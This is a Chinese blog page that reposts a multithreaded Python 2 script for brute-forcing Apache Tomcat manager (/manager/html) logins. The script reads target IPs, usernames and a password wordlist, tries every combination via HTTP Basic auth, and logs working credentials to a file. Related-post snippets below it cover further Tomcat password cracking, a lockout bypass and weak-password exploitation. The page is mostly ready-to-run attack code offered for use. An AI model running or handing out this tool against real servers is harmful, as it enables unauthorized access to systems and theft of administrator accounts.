python 高并发 tomcat_PYTHON版本的TOMCAT暴破工具

最新推荐文章于 2022-06-24 17:27:53 发布
最新推荐文章于 2022-06-24 17:27:53 发布
阅读量82 收藏
点赞数
文章标签: python 高并发 tomcat

2014-4-23 10:55:00

阅读(3191)

评论(0)

#!/usr/bin/env python

# -*- coding: utf-8 -*-

# Functions: Idenfy tomcat password

# Code By BlAck.Eagle

import threading, time, random, sys, urllib2, httplib, base64

from copy import copy

import re

from collections import defaultdict, deque

class Tomcatbrute(threading.Thread):

def __init__(self,server,port,path,user,password):

threading.Thread.__init__(self)

self.host = str(server)

self.port = str(port)

self.path = str(path)

self.user = str(user)

self.password = str(password)

self.userAgent = "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0"

def writeresult(self,record):

fp = open('Result.html','a+')

fp.writelines(record+'')

fp.close()

def run(self):

#union = self.user+':'+self.password

auth = base64.b64encode('%s:%s' % (self.user, self.password)).replace('\n', '')

#flag = Verificate.HttpRequest().verificate(self.host,self.port,self.path)

#if (flag):

#print 'This is a Tomcat!'

#print base64.b64encode(union)

print self.getName(), "-- created."

try:

h = httplib.HTTP(self.host,self.port)

h.putrequest('GET', self.path)

h.putheader('Host', self.host+':'+self.port)

h.putheader('User-agent', self.userAgent)

h.putheader('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')

h.putheader('Accept-Language','en-us')

h.putheader('Accept-Encoding','gzip, deflate')

#h.putheader('Authorization', 'Basic %s' % base64.b64encode(union))

h.putheader('Authorization', 'Basic %s' %auth)

#print auth

h.endheaders()

statuscode, statusmessage, headers = h.getreply()

#print "Response: ", statuscode, statusmessage

#print "Headers: ", headers

#print data

#print headers['Authorization']

#print response.read()

#print response.status

#print statuscode

print headers['Server']

if (re.findall(r'Coyote',headers['Server'])):

if statuscode==200:

print headers['Server']

print "\t\n[OK]Username:",self.user,"Password:",self.password,"\n"

self.writeresult(self.host+":"+self.user+":"+self.password+"\n")

else:

print "\t\nThis is not Tomcat\n"

else:

pass

#print "\t\n[X]Wrong username or password!\n"

except :

#print "An error occurred:", msg

pass

def timer():

now = time.localtime(time.time())

return time.asctime(now)

if __name__ == '__main__':

if len(sys.argv) !=5:

print "\nUsage: ./TomcatBrute.py \n"

print "ex: python TomcatBrute.py ip.txt 8080 users.txt wordlist.txt\n"

sys.exit(1)

try:

users = open(sys.argv[3], "r").readlines()

except(IOError):

print "Error: Check your userlist path\n"

sys.exit(1)

try:

words = open(sys.argv[4], "r").readlines()

except(IOError):

print "Error: Check your wordlist path\n"

sys.exit(1)

try:

port = sys.argv[2]

except(IOError):

print "Error: Check your port\n"

path = '/manager/html'

WEAK_USERNAME = [p.replace('\n','') for p in users]

WEAK_PASSWORD = [p.replace('\n','') for p in words]

#WEAK_USERNAME = ['tomcat','user']

#WEAK_PASSWORD = ['tomcat','user']

accounts =deque() #list数组

for username in WEAK_USERNAME:

for password in WEAK_PASSWORD:

accounts.append((username,password))

#print len(accounts)

#server = sys.argv[1]

host_open = open(sys.argv[1], 'r')

ip = [p.replace('\n','') for p in host_open]

for server in ip:

print "[+] Server:",server

print "[+] Port:",port

print "[+] Users Loaded:",len(WEAK_USERNAME)

print "[+] Words Loaded:",len(WEAK_PASSWORD)

print "[+] Started",timer(),"\n"

for I in range(len(accounts)):

work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1])

work.setDaemon(1)

work.start()

time.sleep(0.1)

print "\n[-] Done -",timer(),"\n"

发表评论

您还没有登录,请[登录]或[注册]

weixin_39988677
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python3实现多线程破解tomcat简单密码
09-16
python3 http.client库实现的登录验证密码程序。 内含多个密码文件。 for server in ip: print( "[+] Server:",server) print ("[+] Port:",port) print ("[+] Users Loaded:",len(WEAK_USERNAME)) print( "[+] Words Loaded:",len(WEAK_PASSWORD)) print ("[+] Started",timer(),"\n") for I in range(len(accounts)): work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) work.setDaemon(1) work.start() time.sleep(0.1) print( "\n[-] Done -",timer(),"\n" )
自己实现tomcat python
吉他程序员的博客
11-02 1198
闲暇之余,自己用python脚本实现了一个简易tomcat,支持功能: 静态页面,文件的请求. 前端ajax请求,后端动态执行python代码,返回json数据,java里面称为servlet。 动态新增静态文件和servlet无需重启tomcat。 代码结构 启动效果: 代码github地址 :pythontomcat 老生常谈:深圳有爱好音乐的会打鼓(吉他,键盘,贝斯等)的程序员和其它职业可以一起交流加入我们乐队一起嗨。我的QQ:657455400 表演视频实例https://v.qq.com
使用python3对tomcat后台爆破
qq_35492650的博客
10-28 969
通过分析 import requests import base64 url = "http://127.0.0.1:8080/manager/html" with open("dict.txt", "r") as f: while 1: passwd = f.readline()[:-1] if passwd == "": bre...
python3最新版本-Python3第三方组件最新版本追踪实现
weixin_37988176的博客
11-01 114
一、说明在安全基线中有一项要求就是注意软件版本是否是最新版本,检查是否是最新版本有两方面的工作一是查看当前使用的软件版本二是当前使用软件的最新版本。在之前的“安全基线自动化扫描、生成报告、加固的实现(以Tomcat为例)”中只是做了前一项把当前使用的软件版本查出来,并没有做当前使用软件的最新版本。当然其实这也是没办法的事,因为基线扫描一般而言都是离线扫描,而追踪最新版本肯定需要联网查询;一般就一个...
tomcat暴破图形化---绕过tomcat 6/7/8的防暴破机制
12-19
tomcat 6/7/8 自带防暴力破解机制,通过塞满cache,挤出已锁定账号,实现完美绕过。
python脚本监控Tomcat服务器的方法
09-20
Python脚本监控Tomcat服务器是一种常见的自动化运维策略,它能够实时检查Tomcat服务的状态,并在服务出现问题时自动发送警报,比如通过邮件通知。这里我们详细介绍如何实现这一功能。 首先,监控Tomcat服务器的核心...
tomcatmanager:用于管理tomcat服务器的命令行工具python
05-03
这是另一种方式:用于管理Tomcat服务器的命令行工具python库。 它能做什么? 该软件包将安装一个名为tomcat-manager的命令行实用程序。 使用您最喜欢的shell可以很容易地编写脚本: $ tomcat-manager --user=...
Tomcat-Ajp-lfi_python_
10-01
【标题】"Tomcat-Ajp-lfi_python_" 涉及...综上所述,"Tomcat-Ajp-lfi_python_"是一个用于检测和验证Tomcat服务器AJP LFI漏洞的Python脚本,它揭示了Web服务器安全的重要性,以及如何利用编程工具进行安全测试和防护。
tomcat_brute_force:Apache Tomcat中的蛮力用户名和密码
04-13
tomcat_brute_force Apache Tomcat中的蛮力用户名和密码 专为Tomcat <7.0.88
ApacheTomcat自动WAR部署和pwning渗透测试工具。_Python_下载.zip
04-22
_Python_下载.zip"似乎包含了一个Python脚本或工具,用于自动化在Tomcat服务器上部署WAR(Web ARchive)文件的过程。WAR文件是Java Web应用的标准打包格式,包含了所有必要的类、资源和配置文件。 自动WAR部署工具...
Tomcat图形化界面异常处理
one_two
08-12 176
Tomcat图形化界面异常处理404或访问不到403问题配置tomcat/config 中的 tomcat-user.xml 加上conf/Catalina/localhost/ 文件夹下补充文件manager.xml 内容如下 404或访问不到 保证tomcat/webapp目录下 有要有ROOT,manage,host-manager,docs(Linux和windows版本不能混用) 403问题 配置tomcat/config 中的 tomcat-user.xml 加上 <role rolena
tomcat爆破 字典生成
lansefly1990的专栏
11-30 2867
tomcat进行爆破时,发现起账户名密码组合为用户名:密码的base64组合 写个python脚本生成个字典 #!/usr/bin/env python # -*- coding:utf-8-*- # 用户名:密码 base64组合 import base64 from itertools import product name=open('F:\usernam.txt','r').r...
python脚本安装tomcat
weixin_45774059的博客
06-24 659
python脚本安装tomcat 执行效果录屏
Tomcat弱口令复现及利用(反弹shell)
weixin_45695535的博客
04-04 5588
整体过程欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编
Tomcat爆破
HeTuiPei的博客
08-21 570
把输入的账户和密码包起来 选择第三个模式 第一个添加用户名 第二个添加: 第三个添加密码 选择编码格式 取消打钩 点击爆破
Tomcat管理界面密码爆破
Nicky_Zheng的博客
07-28 2408
burpsuite爆破tomcat管理密码 浏览器访问tomcat管理界面,使用burpsuite截断,并输入密码,basic编码后的密码为(admin:admin) 将截断的请求发送到intruder中,并对密码字段添加变量标注: 设置payload字段 设置payload编码方式为base64,同时去掉payload的正则匹配 burp爆破成功 msf爆破tomcat管理密码(推荐方式) msf5 > use auxiliary/scanner/http/tomcat_mgr_l
tomcat配置图形化管理界面
进阶的蜗牛
08-23 2474
tomcat配置图形化管理界面 一、介绍 Tomcat已经为我们定义了4种不同的角色——也就是4个rolename,我们只需要使用Tomcat为我们定义的这几种角色就足够满足我们的工作需要了。 以下是Tomcat Manager 4种角色的大致介绍(下面URL中的为通配符): manager-gui 允许访问html接口(即URL路径为/manager/html/) manager-script ...
Java:tomcat 项目部署方法
程序员闪充宝
12-17 268
点击上面  免费订阅本账号!本公众号主要推送javaweb开发相关技术,基础知识点,同时会深入剖析复杂的问题,分享一些优秀的框架,大型项目经验,当今最流行的Javaweb技术,热点科技新...
python如何获取版本信息
云金杞
06-04 1833
import sys sys.version_info sys.version_info(major=3, minor=7, micro=0, releaselevel='final', serial=0) # 判断当前的python版本是否是python3 sys.version_info>=(3,0)
写一个安装tomcatPython脚本
最新发布
05-14
urllib.request.urlretrieve(TOMCAT_DOWNLOAD_URL, "tomcat.tar.gz") tar = tarfile.open("tomcat.tar.gz", "r:gz") tar.extractall() tar.close() # 将Tomcat目录重命名并移动到指定目录 os.rename(f"apache-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值